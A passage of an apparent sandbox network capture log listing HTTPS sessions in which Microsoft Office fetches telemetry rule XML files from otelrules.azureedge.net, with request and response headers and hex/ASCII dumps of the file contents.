                                                                                                                                                                              2024-11-21 07:31:09 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              129192.168.2.64989513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:08 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:09 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                              ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                              x-ms-request-id: ccaf292f-701e-0001-41fa-3ab110000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073109Z-r1d97b99577kk29chC1TEBemmg0000000a3g000000006hmh
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:09 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              130192.168.2.64989713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:08 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:09 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                              ETag: "0x8DC582BDF497570"
                                                                                                                                                                              x-ms-request-id: ff0b0d52-c01e-002b-2681-3b6e00000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073109Z-1777c6cb754gvvgfhC1TEBz4rg0000000avg000000006tae
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:09 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              131192.168.2.64989613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:08 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:09 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:09 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                              ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                              x-ms-request-id: f909f157-c01e-0049-018c-3aac27000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073109Z-1777c6cb754ww792hC1TEBzqu40000000an0000000007y34
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:09 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              132192.168.2.64989813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:09 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:09 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:09 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                              ETag: "0x8DC582BEA414B16"
                                                                                                                                                                              x-ms-request-id: 1aa9c07b-201e-0096-3276-3bace6000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073109Z-1777c6cb754lv4cqhC1TEB13us0000000avg000000001ca2
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:09 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              133192.168.2.64990313.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:10 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:11 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                              ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                              x-ms-request-id: 21476416-401e-00a3-1c88-3a8b09000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073111Z-178bfbc474bnwsh4hC1NYC2ubs00000001700000000080du
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:11 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              134192.168.2.64990413.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:11 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:11 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1362
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                              ETag: "0x8DC582BEB256F43"
                                                                                                                                                                              x-ms-request-id: 2c427fe0-d01e-0082-2d87-3be489000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073111Z-1777c6cb7544n7p6hC1TEByvb40000000ayg000000004qyu
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:11 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              135192.168.2.64990513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:11 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:11 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:11 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1403
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                              ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                              x-ms-request-id: 15f0f872-401e-005b-40aa-3b9c0c000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073111Z-r1d97b995774n5h6hC1TEBvf840000000a000000000097w4
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:11 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              136192.168.2.64990613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:11 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:11 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:11 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1366
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                              ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                              x-ms-request-id: b82dd3a8-b01e-0053-0e8c-3acdf8000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073111Z-178bfbc474bvjk8shC1NYC83ns00000000z0000000009um0
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:11 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              137192.168.2.64990713.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:11 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:11 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:31:11 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 1399
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                              ETag: "0x8DC582BE976026E"
                                                                                                                                                                              x-ms-request-id: 0b679675-f01e-005d-336b-3b13ba000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073111Z-178bfbc474b9xljthC1NYCtw9400000000yg00000000k305
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:31:11 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              138192.168.2.64990913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:31:13 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:31:13 UTC494INHTTP/1.1 200 OK
